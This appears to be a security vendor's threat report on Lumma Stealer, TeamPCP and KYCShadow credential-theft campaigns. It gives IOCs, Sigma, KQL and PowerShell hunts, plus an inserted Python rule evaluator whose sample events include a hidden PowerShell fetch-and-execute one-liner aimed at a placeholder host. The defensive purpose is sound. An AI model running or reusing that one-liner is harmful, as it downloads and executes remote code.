
Lumma Stealer, TeamPCP, and KYCShadow: Multi-Vector Credential Theft Ecosystem Analysis

Security Arsenal Team
April 30, 2026

Threat Summary

Recent OTX pulses indicate a surge in diverse credential theft campaigns moving beyond traditional infostealers to include sophisticated supply chain attacks and mobile banking trojans. The threat landscape is dominated by the convergence of Lumma Stealer (distributed via ClickFix phishing and GhostSocks proxy botnets), TeamPCP's weaponization of the popular Telnyx Python SDK, and KYCShadow, an Android trojan targeting banking customers.

The collective objective of these actors is the mass harvesting of authentication data (cookies, passwords, tokens, OTPs) and financial information (IBANs, credit cards). These campaigns leverage a "Malware-as-a-Service" (MaaS) model, with GhostSocks specifically providing residential proxy infrastructure to obfuscate Lumma Stealer traffic. The attack chains involve complex evasion techniques including steganography (TeamPCP), PowerShell obfuscation (ClickFix), and Firebase-based C2 for mobile malware.

Threat Actor / Malware Profile

1. TeamPCP (Telnyx SDK Supply Chain)

  • Distribution: Malicious packages uploaded to PyPI (Python Package Index).
  • Malware Families: msbuild.exe, sysmon.py, Credential Harvester.
  • Behavior: A three-stage architecture. The trojanized package triggers a platform-specific loader that downloads a second-stage payload hidden inside a WAV file using steganography.
  • Objective: Steal credentials, encrypt them, and exfiltrate.
  • Persistence: Uses legitimate Python SDK execution flow.

2. LofyGang (LofyStealer)

  • Distribution: Social engineering targeting Minecraft players.
  • Malware Families: LofyStealer, GrabBot, chromelevator.
  • Behavior: A 53.5MB Node.js loader disguised as legitimate libraries, dropping a 1.4MB memory-resident C++ payload.
  • Objective: Exfiltrate cookies, passwords, tokens, credit cards, and IBANs from 8+ browsers.
  • Evasion: Syscall-level evasion, memory-only execution.

3. GhostSocks & Lumma Stealer (ClickFix)

  • Distribution: ClickFix-style phishing sites, Russian underground forums.
  • Malware Families: HijackLoader, Lumma Stealer (S1213).
  • Behavior: Users are tricked into running obfuscated PowerShell commands that download malicious MSI payloads; the loader uses DLL sideloading with renamed binaries.
  • C2 Communication: GhostSocks utilizes SOCKS5 and TLS encryption to blend traffic; Lumma Stealer exfiltrates data via these proxy nodes.
  • Objective: Establish residential proxy botnet for credential theft and traffic anonymization.

4. KYCShadow (Android Banking)

  • Distribution: WhatsApp messages posing as bank KYC verification.
  • Malware Families: KYCShadow.
  • Behavior: Multi-stage dropper using WebView-based phishing and native code obfuscation.
  • C2 Communication: Firebase-based remote execution.
  • Objective: Intercept OTPs, steal banking credentials, manipulate VPN traffic to bypass SMS filtering.

IOC Analysis

The provided indicators reveal a hybrid infrastructure utilizing commodity hosting and specialized domains.

  • File Hashes: Multiple SHA256, MD5, and SHA1 hashes associated with loaders (Node.js), payloads (C++), and malicious MSI installers. SOC teams should immediately block execution of these hashes via EDR policies.
  • Network Indicators:
    • Domains: aquasecurtiy.org (typosquatting), serv.biz, retreaw.click, w2.bruggebogeyed.site.
    • IPs: 85.11.161.198, 24.152.36.241.
  • Operationalization: Ingest the IOCs into SIEM correlation engines and firewall/IPS blocklists. The domains serv.biz and serv.xyz are critical for blocking the KYCShadow C2. The IP 85.11.161.198 is a key delivery node for the ClickFix MSI payloads.

Detection Engineering

Sigma Rules

YAML
title: Suspicious PowerShell Downloading MSI File (ClickFix/Lumma)
id: a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d
description: Detects PowerShell processes downloading .msi files, a common behavior in ClickFix campaigns distributing HijackLoader and Lumma Stealer.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadFile'
            - 'IEX'
            - 'DownloadString'
    selection_filter:
        CommandLine|contains: '.msi'
    condition: selection and selection_filter
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Python SDK Spawning MSBuild or Steganography Tools (TeamPCP)
id: b2c3d4e5-f6a7-4b8c-9d0e-1f2a3b4c5d6e
description: Detects Python processes (pip/python.exe) spawning msbuild.exe or accessing steganography-related utilities, indicative of the TeamPCP supply chain attack.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.defense_evasion
    - attack.t1202
logsource:
    product: windows
    category: process_creation
detection:
    # Parent and child constraints belong in one selection: two separate
    # selections that both constrain Image can never be true for the same event.
    selection:
        ParentImage|endswith:
            - '\python.exe'
            - '\pip.exe'
        Image|endswith:
            - '\msbuild.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'steg'
            - 'wav'
    condition: selection
falsepositives:
    - Legitimate developer build environments
level: high
---
title: Potential KYCShadow C2 Communication (Android)
id: c3d4e5f6-a7b8-4c9d-0e1f-2a3b4c5d6e7f
description: Detects network connections to known KYCShadow C2 domains often used for Firebase communication and OTP interception.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: android
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'serv.biz'
            - 'serv.xyz'
            - 'api.biz'
    condition: selection
falsepositives:
    - Unknown
level: critical
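As an added example that is not part of the original report, the following Python evaluator applies the selection semantics of the two Windows rules above (list values OR-ed, map keys AND-ed, case-insensitive `contains`/`endswith`) to constructed process-creation records. It assumes the TeamPCP parent/child constraints are expressed in a single selection via `ParentImage`; every event value below is made up, and `example.invalid` is a reserved name, not an indicator.

```python
# Added example (not from the report): a tiny evaluator for the Sigma selection
# semantics used above (list values OR-ed, map keys AND-ed, case-insensitive),
# run over constructed Sysmon-style process_creation records.

def _field_matches(record, key, patterns):
    field, _, modifier = key.partition("|")
    value = str(record.get(field, "")).lower()
    patterns = patterns if isinstance(patterns, list) else [patterns]
    if modifier == "contains":
        return any(p.lower() in value for p in patterns)
    if modifier == "endswith":
        return any(value.endswith(p.lower()) for p in patterns)
    raise ValueError(f"unsupported Sigma modifier: {modifier!r}")

def selection_matches(record, selection):
    """Every key in a selection map must match (AND)."""
    return all(_field_matches(record, k, v) for k, v in selection.items())

# ClickFix/Lumma: download cmdlet AND '.msi' on a powershell.exe command line.
CLICKFIX_SELECTION = {
    "Image|endswith": "\\powershell.exe",
    "CommandLine|contains": ["Invoke-WebRequest", "DownloadFile", "IEX", "DownloadString"],
}
CLICKFIX_FILTER = {"CommandLine|contains": ".msi"}

def clickfix_hit(record):  # condition: selection and selection_filter
    return selection_matches(record, CLICKFIX_SELECTION) and selection_matches(record, CLICKFIX_FILTER)

# TeamPCP: parent and child constraints in ONE selection via ParentImage (two
# AND-ed selections that both constrain Image can never match the same event).
TEAMPCP_SELECTION = {
    "ParentImage|endswith": ["\\python.exe", "\\pip.exe"],
    "Image|endswith": ["\\msbuild.exe", "\\cmd.exe"],
    "CommandLine|contains": ["steg", "wav"],
}

def teampcp_hit(record):
    return selection_matches(record, TEAMPCP_SELECTION)
PS, PY, CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Python312\python.exe", r"C:\Windows\System32\cmd.exe"
EVENTS = [  # constructed sample events; example.invalid is a reserved name, not an IOC
    {"Image": PS, "CommandLine": "powershell -w hidden -c \"iex((New-Object Net.WebClient).DownloadString('http://example.invalid/up.msi'))\""},
    {"Image": PS, "CommandLine": "powershell Invoke-WebRequest https://example.invalid/a.zip -OutFile a.zip"},
    {"ParentImage": PY, "Image": CMD, "CommandLine": "cmd.exe /c start loader.wav"},
    {"ParentImage": PY, "Image": CMD, "CommandLine": "cmd.exe /c msbuild project.sln"},
]

def hits(events):
    """Return (clickfix_hits, teampcp_hits) for a list of events."""
    return sum(clickfix_hit(e) for e in events), sum(teampcp_hit(e) for e in events)
```

The benign download (no `.msi`) and the benign `msbuild` build (no `steg`/`wav` substring) fall through both rules, while the hidden-window one-liner and the python.exe-spawned `.wav` command line trigger one rule each.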

KQL Hunt Query (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix PowerShell activity and GhostSocks/Lumma C2 traffic
let IOCs = dynamic(["85.11.161.198", "24.152.36.241", "aquasecurtiy.org", "retreaw.click", "serv.biz", "serv.xyz", "api.biz"]);
let MaliciousHashes = dynamic(["f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc", "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"]);
// Process creation events: the PowerShell process carrying the ClickFix one-liner
// (FileName) as well as anything it spawns, such as msiexec (InitiatingProcessFileName)
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "pwsh.exe") or InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine contains ".msi" or ProcessCommandLine has "http"
// Verbatim string literal so the RE2 escapes reach the regex engine unchanged
| extend URL = extract(@"https?://\S+?\.msi", 0, ProcessCommandLine)
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, URL, FolderPath
| union (DeviceNetworkEvents
    | where RemoteUrl has_any (IOCs) or RemoteIP in (IOCs)
    | project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName)
| union (DeviceFileEvents
    | where SHA256 in~ (MaliciousHashes)
    | project Timestamp, DeviceName, FileName, FolderPath, SHA256)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
# IOC Hunt Script for TeamPCP, LofyStealer, and Lumma Stealer
# The IOC list mixes SHA256 (64 hex chars) and MD5 (32 hex chars) values, so each
# hash is compared with the algorithm that produced it rather than SHA256 only.
$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c"
)

$MaliciousDomains = @(
    "aquasecurtiy.org",
    "retreaw.click",
    "w2.bruggebogeyed.site",
    "robinhuds.com",
    "serv.biz",
    "serv.xyz"
)

# Group the IOC hashes by algorithm so every file is hashed once per algorithm
# instead of once per IOC; Get-FileHash returns uppercase hex, hence the
# case-insensitive set.
$HashSets = @{}
foreach ($Hash in $MaliciousHashes) {
    $Algorithm = switch ($Hash.Length) { 64 { 'SHA256' } 40 { 'SHA1' } 32 { 'MD5' } }
    if (-not $Algorithm) { Write-Warning "Skipping hash of unknown length: $Hash"; continue }
    if (-not $HashSets.ContainsKey($Algorithm)) {
        $HashSets[$Algorithm] = [System.Collections.Generic.HashSet[string]]::new([System.StringComparer]::OrdinalIgnoreCase)
    }
    [void]$HashSets[$Algorithm].Add($Hash)
}

Write-Host "[+] Checking for malicious file hashes..."
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
Get-ChildItem -Path $Drives -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    foreach ($Algorithm in $HashSets.Keys) {
        $FileHash = Get-FileHash -LiteralPath $_.FullName -Algorithm $Algorithm -ErrorAction SilentlyContinue
        if ($FileHash -and $HashSets[$Algorithm].Contains($FileHash.Hash)) {
            [pscustomobject]@{ Path = $FileHash.Path; Algorithm = $Algorithm; Hash = $FileHash.Hash }
        }
    }
}

Write-Host "[+] Checking DNS cache for malicious domains..."
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($Domain in $MaliciousDomains) {
    # Match the domain itself and its subdomains only; a bare "*$Domain*" wildcard
    # would also flag unrelated names that merely contain the string.
    $DnsCache | Where-Object { $_.Entry -eq $Domain -or $_.Entry -like "*.$Domain" } | Select-Object Entry, Data
}

Write-Host "[+] Checking for the Telnyx Python SDK (TeamPCP supply chain)..."
# pip show reports the installed version so the analyst can compare it against
# the trusted releases before deciding whether the package must be removed.
$TelnyxInfo = pip show telnyx 2>$null
if ($LASTEXITCODE -eq 0 -and $TelnyxInfo) {
    $Version = ($TelnyxInfo | Select-String -Pattern '^Version:\s*(.+)$').Matches[0].Groups[1].Value
    Write-Host "[!] telnyx package found (version $Version). Verify this version immediately."
}

Response Priorities

  • Immediate: Block all listed IOCs (Domains, IPs, Hashes) at the perimeter and endpoint. Investigate any PowerShell processes spawning msiexec or downloading .msi files.
  • 24 Hours: Initiate credential resets for accounts accessed from devices flagged by EDR alerts related to Lumma Stealer or LofyStealer. Audit Python package repositories for instances of the telnyx SDK and verify checksums.
  • 1 Week: Review supply chain security for open-source dependencies. Implement strict application allowlisting for Python environments. Enhance mobile device management (MDM) policies to block side-loaded APKs and warn users against KYC scams on WhatsApp.
